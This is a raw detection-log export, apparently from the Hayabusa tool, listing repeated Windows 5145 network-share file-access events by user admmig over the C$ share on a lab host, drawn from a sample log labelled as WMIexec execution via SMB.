10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 : IP Address: 
